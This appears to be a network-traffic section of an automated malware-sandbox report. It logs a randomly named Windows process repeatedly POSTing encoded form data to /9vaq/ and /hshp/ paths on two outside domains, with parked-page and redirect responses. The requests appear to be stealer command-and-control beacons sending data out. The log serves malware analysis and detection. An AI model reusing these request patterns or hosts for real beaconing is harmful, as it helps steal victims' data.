                                                                                        Data Raw: 6a 6e 51 58 3d 76 55 31 4b 6a 4a 77 4c 6f 69 56 31 65 73 64 45 35 73 63 4c 2b 67 78 78 51 46 76 44 71 79 2b 49 32 76 58 47 46 70 70 36 78 32 4d 65 53 45 69 57 4b 37 35 56 73 41 2b 6f 38 32 78 32 33 73 79 73 77 6e 38 58 79 78 52 74 6b 44 7a 63 63 79 59 74 67 36 68 69 71 53 6d 69 4e 65 44 39 58 58 79 73 58 4f 70 69 36 50 49 68 77 54 33 70 55 33 57 76 6c 4d 4f 53 41 4a 71 68 69 33 38 78 6d 4a 7a 70 51 53 54 69 38 6d 71 65 30 34 61 6c 44 4b 32 6f 74 61 52 64 62 37 63 43 48 42 37 2f 6d 74 6c 51 5a 6a 38 77 59 53 4d 73 57 36 4e 44 54 48 6d 6e 76 4c 58 64 73 35 6a 59 48 44 38 32 37 52 43 2f 5a 67 3d 3d
                                                                                        Data Ascii: jnQX=vU1KjJwLoiV1esdE5scL+gxxQFvDqy+I2vXGFpp6x2MeSEiWK75VsA+o82x23syswn8XyxRtkDzccyYtg6hiqSmiNeD9XXysXOpi6PIhwT3pU3WvlMOSAJqhi38xmJzpQSTi8mqe04alDK2otaRdb7cCHB7/mtlQZj8wYSMsW6NDTHmnvLXds5jYHD827RC/Zg==


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        8192.168.2.224917184.32.84.32801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:56.209793091 CEST2472OUTPOST /9vaq/ HTTP/1.1
                                                                                        Host: www.gws-treinamento2.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.gws-treinamento2.shop
                                                                                        Referer: http://www.gws-treinamento2.shop/9vaq/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 76 55 31 4b 6a 4a 77 4c 6f 69 56 31 52 73 4e 45 2f 50 30 4c 76 77 78 77 4d 56 76 44 78 43 2f 50 32 76 62 47 46 6f 64 71 79 45 41 65 53 58 61 57 4b 59 52 56 71 41 2b 6f 73 47 77 2b 35 4d 79 2b 77 6a 63 68 79 77 68 39 6b 42 2f 63 64 56 63 74 69 34 35 68 6c 43 6d 61 47 2b 44 38 58 58 7a 6b 58 4f 35 6d 36 50 4d 50 77 54 66 70 58 46 2b 76 77 4d 4f 54 65 5a 71 68 69 33 38 39 6d 4a 7a 4a 51 53 4c 4d 38 6e 43 4f 30 4c 43 6c 44 76 69 6f 2b 70 4a 53 4c 4c 64 4c 59 78 37 68 74 6f 45 50 59 7a 42 37 61 45 30 2b 49 35 45 76 4d 45 47 4a 6f 49 2f 41 6f 70 44 6e 50 30 70 2f 2f 43 71 37 50 76 66 46 59 30 34 58 51 35 74 50 41 32 4c 76 2b 64 67 44 44 5a 49 39 32 38 35 63 72 31 4b 55 78 6d 78 4b 69 41 45 42 64 38 53 5a 5a 6d 53 64 2b 70 69 45 56 58 70 6d 76 52 65 30 2b 62 4b 63 6b 62 66 35 6f 45 36 52 36 4a 4a 57 71 4b 39 65 6b 54 53 54 62 50 32 7a 75 79 7a 70 38 7a 45 38 79 34 38 4c 4d 42 5a 49 35 32 39 55 44 37 47 56 6e 61 42 46 2f 37 44 48 59 72 55 54 51 54 41 71 41 69 77 51 6c 36 38 65 79 67 6a 69 49 [TRUNCATED]
                                                                                        Data Ascii: jnQX=vU1KjJwLoiV1RsNE/P0LvwxwMVvDxC/P2vbGFodqyEAeSXaWKYRVqA+osGw+5My+wjchywh9kB/cdVcti45hlCmaG+D8XXzkXO5m6PMPwTfpXF+vwMOTeZqhi389mJzJQSLM8nCO0LClDvio+pJSLLdLYx7htoEPYzB7aE0+I5EvMEGJoI/AopDnP0p//Cq7PvfFY04XQ5tPA2Lv+dgDDZI9285cr1KUxmxKiAEBd8SZZmSd+piEVXpmvRe0+bKckbf5oE6R6JJWqK9ekTSTbP2zuyzp8zE8y48LMBZI529UD7GVnaBF/7DHYrUTQTAqAiwQl68eygjiIynPQDQJAGzk2ZUcHkYWk5g/mwcgZfz9ckTT9E6OVgabZR53RAXTuzFFeC6veabctXxbpa2jcJYuC2VkNUX3qBdxfujBUjPvLC7l3M3wZhEKHDZdekRhw2VzRus7/QcEGM152f5rru4DZGfAZX1uyi5LN4fptW35gIXGCW+W3Yu4Lcn8+zW/JNC37bIIMJeTdHf+zF0zy2Vtd1ytZFnwyy6zX3emdvLVT+CvhSUn4/XYfSZKvnczo0obPg2gsjuNTt6z+0tSpPOarQU495MBXrLIS1f34OxDooHgDq31M14i3RGoYj5G0Ah6MdVeKgkVIQwguS0R0X94iEOBI4KSOGwMWkdIb8aVK4PTN04BdLPGBF+fUuDOpKuKbrxV9HCIxiEsOFBibWr05YBbfoFqLNYDvWprq0KEm7voGbC53B5IlmLtSAqRQVtOdBVY45pI9W9A3sCapthXK/isJMx0H2KdFednA0OjmGM4ykH365IOgAhgJgpC6CgTo+ZM3irRLfGkOeixYZ1oIIm8x+ynQ+VaptTUSb8h/6c6qARqq3KOn1MMoygHgZNEcSwJ7eJFYiv1GrXlqpGMz5/DnhLFbaCJUzJq1QZ64mMBwJN+WvVsGOl7Wl3hx3okEklPk4Gc+zNERMw+RyHK/WXcLvOSXTfcJwDpADhCzv3 [TRUNCATED]
                                                                                        Oct 9, 2024 12:51:56.214865923 CEST1719OUTData Raw: 68 64 75 6a 63 78 4e 6e 49 6a 2b 54 2f 43 43 7a 75 53 4c 44 34 2b 52 56 46 72 6d 64 30 70 7a 5a 71 6d 73 59 79 4e 63 33 47 53 6d 76 33 65 4a 6a 58 4f 45 64 6f 4e 30 7a 63 4e 69 41 4c 69 62 4a 70 4a 62 50 4f 58 61 31 79 36 6d 2f 6e 51 46 54 79 65
                                                                                        Data Ascii: hdujcxNnIj+T/CCzuSLD4+RVFrmd0pzZqmsYyNc3GSmv3eJjXOEdoN0zcNiALibJpJbPOXa1y6m/nQFTyeGbTfTdpC0uSCoJtXM7OvGhVqIPW3qBrPpxiWBE18GN5AQLI/nj8PrpEt+71AgSSGAFn+pdnfhdZ9zNeTCPs0jPv1iUo7O2hcq+C2I5CuRwVmu8W2TSzx23Iq7Xj1ODF1GKwoLawdRi70S5ZKAwJK8hy0o7062sToe


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        9192.168.2.224917284.32.84.32801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:51:58.757220984 CEST483OUTGET /9vaq/?jnQX=iWdqg5dx+nxgXMJv6fkLiwcVGHqfo0uT2/zaY5dN5WRtbG72PfYUoC7d90JyyrKd7ng9xxty1D2HdVJ8v/8coxWlMdmEcT26SfoT6cgNzC3qUmeIqeviCd2ntANB&op9=BLtTm0V HTTP/1.1
                                                                                        Host: www.gws-treinamento2.shop
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Language: en-US,en
                                                                                        Connection: close
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Oct 9, 2024 12:51:59.210268021 CEST1236INHTTP/1.1 200 OK
                                                                                        Server: hcdn
                                                                                        Date: Wed, 09 Oct 2024 10:51:59 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 10072
                                                                                        Connection: close
                                                                                        Vary: Accept-Encoding
                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                        x-hcdn-request-id: 8e4c393ed65c6769f3a1d48618b4a960-bos-edge1
                                                                                        Expires: Wed, 09 Oct 2024 10:51:58 GMT
                                                                                        Cache-Control: no-cache
                                                                                        Accept-Ranges: bytes
                                                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 74 69 74 6c 65 3e 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 20 68 74 74 70 2d 65 71 75 69 76 3d 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 50 61 72 6b 65 64 20 44 6f 6d 61 69 6e 20 6e 61 6d 65 20 6f 6e 20 48 6f 73 74 69 6e 67 65 72 20 44 4e 53 20 73 79 73 74 65 6d 22 20 6e 61 6d 65 3d 64 65 73 63 72 69 70 74 69 6f 6e 3e 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 68 74 74 70 73 3a 2f 2f 6d 61 78 63 64 6e 2e 62 6f 6f 74 73 74 72 61 70 63 64 6e 2e 63 6f 6d 2f 62 6f [TRUNCATED]
                                                                                        Data Ascii: <!doctype html><title>Parked Domain name on Hostinger DNS system</title><meta charset=utf-8><meta content="IE=edge,chrome=1" http-equiv=X-UA-Compatible><meta content="Parked Domain name on Hostinger DNS system" name=description><meta content="width=device-width,initial-scale=1" name=viewport><link href=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css rel=stylesheet><script src=https://ajax.googleapis.com/ajax/libs/jquery/3.2.1/jquery.min.js></script><script src=https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js></script><link href=https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.3/css/all.min.css rel=stylesheet><link href="https://fonts.googleapis.com/css?family=Open+Sans:300,300i,400,400i,600,600i,700,700i,800,800i&subset=cyrillic,cyrillic-ext,greek,greek-ext,latin-ext,vietnamese" rel=stylesheet><style>html{height:100%}body{font-family:"
                                                                                        Oct 9, 2024 12:51:59.210295916 CEST1236INData Raw: 4f 70 65 6e 20 53 61 6e 73 22 2c 48 65 6c 76 65 74 69 63 61 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 23 30 30 30 3b 70 61 64 64 69 6e 67 3a 30 3b 6d 61 72 67 69 6e 3a 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 34 32 38 3b 62 61
                                                                                        Data Ascii: Open Sans",Helvetica,sans-serif;color:#000;padding:0;margin:0;line-height:1.428;background:linear-gradient(10.7deg,#e9edfb -50.21%,#f6f8fd 31.11%,#fff 166.02%)}h1,h2,h3,h4,h5,h6,p{padding:0;margin:0;color:#333}h1{font-size:30px;font-weight:600
                                                                                        Oct 9, 2024 12:51:59.210308075 CEST1236INData Raw: 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 33 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 35 70 78 3b 70 61 64 64 69 6e 67 2d 72 69 67 68 74 3a 35 70 78 7d 2e 6e 61 76 62 61 72 2d 6e 61 76 3e 6c 69 3e 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 64 65
                                                                                        Data Ascii: x;font-size:13px;padding-left:5px;padding-right:5px}.navbar-nav>li>a:hover{text-decoration:none;color:#cdc3ea!important}.navbar-nav>li>a i{margin-right:5px}.nav-bar img{position:relative;top:3px}.congratz{margin:0 auto;text-align:center}.top-c
                                                                                        Oct 9, 2024 12:51:59.210453033 CEST1236INData Raw: 72 3a 23 66 66 66 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 7b 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 30 21 69 6d 70 6f 72 74 61 6e 74 7d 2e 6e 61 76 62 61 72 2d 69 6e 76 65 72 73 65 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f
                                                                                        Data Ascii: r:#fff!important}.navbar{border-radius:0!important}.navbar-inverse{background-color:#36344d;border:none}.column-custom-wrap{padding-top:10px 20px}.badge{font-size:12px;line-height:16px;min-height:20px;min-width:20px;vertical-align:middle;text-
                                                                                        Oct 9, 2024 12:51:59.210464954 CEST1236INData Raw: 65 6c 63 6f 6d 65 2f 69 6d 61 67 65 73 2f 68 6f 73 74 69 6e 67 65 72 2d 6c 6f 67 6f 2e 73 76 67 20 61 6c 74 3d 48 6f 73 74 69 6e 67 65 72 20 77 69 64 74 68 3d 31 32 30 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c
                                                                                        Data Ascii: elcome/images/hostinger-logo.svg alt=Hostinger width=120></a></div><div class="collapse navbar-collapse" id=myNavbar><ul class="nav navbar-links navbar-nav navbar-right"><li><a href=https://www.hostinger.com/tutorials rel=nofollow><i aria-hidd
                                                                                        Oct 9, 2024 12:51:59.210479021 CEST1236INData Raw: 78 20 63 6f 6c 75 6d 6e 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 78 73 2d 31 32 20 63 6f 6c 2d 73 6d 2d 34 20 63 6f 6c 75 6d 6e 2d 63 75 73 74 6f 6d 2d 77 72 61 70 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 63 6f 6c 75 6d
                                                                                        Data Ascii: x column-wrap"><div class="col-xs-12 col-sm-4 column-custom-wrap"><div class=column-custom><div class=column-title><span style=margin-right:8px>Buy website hosting </span><span class=badge>Save 90%</span></div><br><p>Extremely fast, secure and
                                                                                        Oct 9, 2024 12:51:59.210578918 CEST1236INData Raw: 28 29 7b 74 68 69 73 2e 75 74 66 31 36 3d 7b 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 6f 29 7b 66 6f 72 28 76 61 72 20 72 2c 65 2c 6e 3d 5b 5d 2c 74 3d 30 2c 61 3d 6f 2e 6c 65 6e 67 74 68 3b 74 3c 61 3b 29 7b 69 66 28 35 35 32 39 36 3d 3d
                                                                                        Data Ascii: (){this.utf16={decode:function(o){for(var r,e,n=[],t=0,a=o.length;t<a;){if(55296==(63488&(r=o.charCodeAt(t++)))){if(e=o.charCodeAt(t++),55296!=(64512&r)||56320!=(64512&e))throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence");r=((1023
                                                                                        Oct 9, 2024 12:51:59.210592031 CEST1236INData Raw: 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 32 29 22 29 3b 69 66 28 73 3e 4d 61 74 68 2e 66 6c 6f 6f 72 28 28 72 2d 66 29 2f 70 29 29 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 70 75 6e 79 63 6f 64 65 5f 6f 76 65 72
                                                                                        Data Ascii: ("punycode_bad_input(2)");if(s>Math.floor((r-f)/p))throw RangeError("punycode_overflow(1)");if(f+=s*p,s<(C=g<=i?1:i+26<=g?26:g-i))break;if(p>Math.floor(r/(o-C)))throw RangeError("punycode_overflow(2)");p*=o-C}if(i=n(f-l,h=m.length+1,0===l),Mat
                                                                                        Oct 9, 2024 12:51:59.210664034 CEST524INData Raw: 77 5b 64 5d 3f 31 3a 30 29 29 29 2c 75 3d 6e 28 66 2c 69 2b 31 2c 69 3d 3d 63 29 2c 66 3d 30 2c 2b 2b 69 7d 7d 2b 2b 66 2c 2b 2b 68 7d 72 65 74 75 72 6e 20 79 2e 6a 6f 69 6e 28 22 22 29 7d 2c 74 68 69 73 2e 54 6f 41 53 43 49 49 3d 66 75 6e 63 74
                                                                                        Data Ascii: w[d]?1:0))),u=n(f,i+1,i==c),f=0,++i}}++f,++h}return y.join("")},this.ToASCII=function(o){for(var r=o.split("."),e=[],n=0;n<r.length;++n){var t=r[n];e.push(t.match(/[^A-Za-z0-9-]/)?"xn--"+punycode.encode(t):t)}return e.join(".")},this.ToUnicode


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.2249173103.106.67.112801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:04.630999088 CEST2472OUTPOST /hshp/ HTTP/1.1
                                                                                        Host: www.sailforever.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.sailforever.xyz
                                                                                        Referer: http://www.sailforever.xyz/hshp/
                                                                                        Content-Length: 2161
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 4c 4f 37 6e 45 6c 46 2f 51 7a 79 30 69 58 68 54 2b 46 63 67 63 58 7a 30 76 55 75 61 67 74 6a 68 73 56 2b 6f 4f 53 59 43 46 71 66 43 39 68 59 2b 57 46 51 5a 74 43 59 36 34 45 6f 56 42 5a 2b 33 6d 58 72 6a 75 52 6a 44 46 49 71 2b 4b 68 4b 56 2b 62 31 76 31 50 62 58 46 75 41 5a 66 6c 6b 4d 2b 6c 52 67 6a 4c 7a 38 6a 6b 41 46 78 4e 57 62 6f 65 54 45 50 6a 5a 46 34 77 35 4b 2b 34 48 73 4b 73 58 78 30 77 66 36 67 7a 59 64 31 62 37 68 6e 45 57 74 71 73 51 6b 4b 36 39 39 51 63 42 7a 66 59 37 47 6e 74 38 7a 43 4e 55 4d 2b 61 55 4e 69 61 74 76 42 4e 7a 59 64 6b 70 47 49 50 73 49 56 35 77 45 4f 6f 66 76 6e 53 4c 52 39 5a 63 57 58 56 4d 69 52 53 70 74 7a 6b 70 4c 71 56 49 31 6e 47 57 61 61 68 6a 54 39 5a 4d 39 56 4b 47 6e 5a 31 4f 62 55 41 78 67 44 37 39 55 31 57 6f 52 34 47 46 64 6c 44 4b 63 47 32 74 6d 53 50 6b 4e 68 6e 75 51 6f 42 38 54 73 69 5a 59 46 52 59 63 57 5a 62 4e 52 47 71 53 77 74 68 62 68 59 59 70 54 67 56 2b 6f 4e 46 50 31 31 73 76 61 6f 34 74 [TRUNCATED]
                                                                                        Data Ascii: jnQX=BDKkReVOQWAWGLO7nElF/Qzy0iXhT+FcgcXz0vUuagtjhsV+oOSYCFqfC9hY+WFQZtCY64EoVBZ+3mXrjuRjDFIq+KhKV+b1v1PbXFuAZflkM+lRgjLz8jkAFxNWboeTEPjZF4w5K+4HsKsXx0wf6gzYd1b7hnEWtqsQkK699QcBzfY7Gnt8zCNUM+aUNiatvBNzYdkpGIPsIV5wEOofvnSLR9ZcWXVMiRSptzkpLqVI1nGWaahjT9ZM9VKGnZ1ObUAxgD79U1WoR4GFdlDKcG2tmSPkNhnuQoB8TsiZYFRYcWZbNRGqSwthbhYYpTgV+oNFP11svao4tru+hs6iKTZ1wjAOyBF3yQSp0JG3rnyjnHqwgc1pOdkje6jjq0AbEw56At6Gl93pnsFXJ78tkxqpfJqDs8Z86E8oGT69OPb2/vqz91f4kO2hJMAKBpBW9d1UbkBefy6j6D0Ap3G3uTnxoFrTq1SEbhzBXMit82JGiOV+SR+nfVdCfH3YpFeyWcI97urz5+299q5lwdxBSGmmdWZwT9OuBnungAbyOD8gPyUUDFQZRO1oEWjbE31tq2AOSxXM49pzpQb85RPNGRovIqaWsempIxOOnCvAq+mFZgogQxtulG7VxYhLYNFhrozR2KlbZ+PHfxyWz3wRURQYDol/XvRftv95Vaq4QQzG9ML7Y6Ys47HcS2/Cl/GgCFnOloZX2vE2Zt92pZ73+Ynjd3mKQtBUnhSEpaIFIEvqtdk90K6IcFtTsiTxlIuGluqsAx19D+Rax7L9LlIksngiAhwT40fpksqC6Gf+ta1GlNl4zizKvxM4lvIA2o4hxu78tRZYMXAdO+1i6rALkywlD7U2GdNQzgOv+GCB8I0Dq9/xVzyDjv4pb9hsWedfMC3USFhbDH17EttyRdvGL/NrD6Tjh2LL/jQDFgUALeRqGBFAJlxmBirg20ynyu8iMcsq+r5VzFTSS1nEt+vaAAI7dgonuAcECxa/TP7q2sH6BgH [TRUNCATED]
                                                                                        Oct 9, 2024 12:52:04.635890007 CEST237OUTData Raw: 50 4a 62 79 37 43 45 34 37 36 39 2f 79 5a 7a 43 57 79 4e 34 64 31 68 4e 32 48 47 59 79 75 63 32 6c 59 2b 38 6c 41 41 68 33 54 57 47 49 45 47 79 56 50 45 4f 65 4b 63 4e 78 68 64 39 36 47 64 50 39 56 67 4c 34 79 57 31 37 4c 45 2f 57 51 4e 75 55 33
                                                                                        Data Ascii: PJby7CE4769/yZzCWyN4d1hN2HGYyuc2lY+8lAAh3TWGIEGyVPEOeKcNxhd96GdP9VgL4yW17LE/WQNuU3aXhvlOKrHAMPpcixAwdTyxuwH+GqjHMK+J+Mz4i/8+O13bYb3a6FK+bCBfkruT6sNBjffFXc22elU79MLhSFuLnPB6GDmZIkWcnzKphgc2DmIQTIjjeMZBrfNimvrGv42Q4OMtie71r8gUcoVBrUijBq0r0
                                                                                        Oct 9, 2024 12:52:05.278455019 CEST245INHTTP/1.1 302 Found
                                                                                        Location: https://www.sailforever.xyz/hshp/
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Wed, 09 Oct 2024 10:52:05 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.2249174103.106.67.112801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:07.180661917 CEST748OUTPOST /hshp/ HTTP/1.1
                                                                                        Host: www.sailforever.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.sailforever.xyz
                                                                                        Referer: http://www.sailforever.xyz/hshp/
                                                                                        Content-Length: 201
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 47 49 57 37 6f 31 6c 46 39 77 7a 79 7a 69 58 68 61 65 46 61 67 63 4c 4b 30 71 6b 2b 61 54 39 6a 68 38 46 2b 70 39 36 59 4d 6c 72 74 57 74 68 6d 78 32 46 46 5a 74 43 71 36 34 49 6f 56 42 4e 2b 32 44 62 72 6c 71 4e 38 62 6c 49 6f 31 71 68 4c 56 2b 58 47 76 31 4b 47 58 47 75 41 5a 61 6c 6b 4e 2b 31 52 77 51 6a 7a 35 54 6b 4b 44 78 4d 4d 62 6f 53 47 45 50 7a 52 46 35 4d 35 4b 4e 38 48 76 65 34 58 37 44 4d 66 76 51 7a 46 48 6c 61 31 75 33 56 43 69 63 38 6d 6b 4a 6d 73 32 7a 73 64 30 64 55 39 4b 6b 4e 71 78 69 4e 42 46 76 62 55 44 57 32 70 73 41 3d 3d
                                                                                        Data Ascii: jnQX=BDKkReVOQWAWGIW7o1lF9wzyziXhaeFagcLK0qk+aT9jh8F+p96YMlrtWthmx2FFZtCq64IoVBN+2DbrlqN8blIo1qhLV+XGv1KGXGuAZalkN+1RwQjz5TkKDxMMboSGEPzRF5M5KN8Hve4X7DMfvQzFHla1u3VCic8mkJms2zsd0dU9KkNqxiNBFvbUDW2psA==
                                                                                        Oct 9, 2024 12:52:07.816772938 CEST245INHTTP/1.1 302 Found
                                                                                        Location: https://www.sailforever.xyz/hshp/
                                                                                        Server: Dynamic Http Server
                                                                                        X-Ratelimit-Limit: 101
                                                                                        X-Ratelimit-Remaining: 100
                                                                                        X-Ratelimit-Reset: 1
                                                                                        Date: Wed, 09 Oct 2024 10:52:07 GMT
                                                                                        Content-Length: 0
                                                                                        Connection: close


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.2249175103.106.67.112801928C:\Program Files (x86)\KQRNtmBPThbvvzaMMOcZozpxSfDGSMYrUQPkcToGGSWflooidEyNFyrwlphUQHgGxzAmaaiAEAkZo\dYBbPgrkLOIMQ.exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Oct 9, 2024 12:52:09.722563028 CEST2472OUTPOST /hshp/ HTTP/1.1
                                                                                        Host: www.sailforever.xyz
                                                                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                        Accept-Language: en-US,en
                                                                                        Origin: http://www.sailforever.xyz
                                                                                        Referer: http://www.sailforever.xyz/hshp/
                                                                                        Content-Length: 3625
                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                        Connection: close
                                                                                        Cache-Control: max-age=0
                                                                                        User-Agent: Mozilla/5.0 (Linux; Android 5.1.1; SM-T537V Build/LMY47X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Safari/537.36
                                                                                        Data Raw: 6a 6e 51 58 3d 42 44 4b 6b 52 65 56 4f 51 57 41 57 48 72 65 37 6b 32 39 46 31 77 7a 78 32 69 58 68 54 2b 46 65 67 63 58 4b 30 76 55 75 61 68 78 6a 68 75 74 2b 6f 65 53 59 44 46 72 74 65 4e 68 59 2b 57 46 54 5a 74 2f 54 36 34 34 43 56 46 70 2b 33 69 4c 72 6a 76 52 6a 43 46 49 71 6a 61 68 49 56 2b 58 54 76 31 36 43 58 46 44 72 5a 65 78 6b 4e 4c 70 52 68 51 6a 77 31 7a 6b 4b 44 78 4d 49 62 6f 53 71 45 4f 62 4a 46 39 41 70 4b 2b 55 48 73 36 73 58 33 45 77 59 6e 77 7a 5a 4c 46 62 6c 68 6e 49 6e 74 71 73 55 6b 4b 75 58 39 51 67 42 38 73 67 37 47 6b 31 2f 33 53 4e 58 43 65 61 55 41 43 62 4c 76 42 4d 71 59 64 6b 70 47 49 7a 73 4a 46 35 77 45 50 6f 51 68 48 53 4c 50 4e 5a 62 63 32 70 59 69 58 2b 44 74 7a 31 63 4c 36 68 49 30 68 61 57 52 4b 68 6a 62 74 59 46 39 56 4b 4c 78 70 30 66 62 51 73 49 67 48 66 74 55 31 57 6f 52 36 4f 46 58 51 33 4b 4d 6d 32 74 70 79 50 68 43 42 6e 76 51 6f 56 43 54 76 2b 5a 59 45 5a 59 63 68 39 62 63 44 2b 70 61 67 74 67 66 68 59 65 37 6a 67 41 2b 6f 52 6a 50 32 56 56 76 5a 77 34 74 [TRUNCATED]
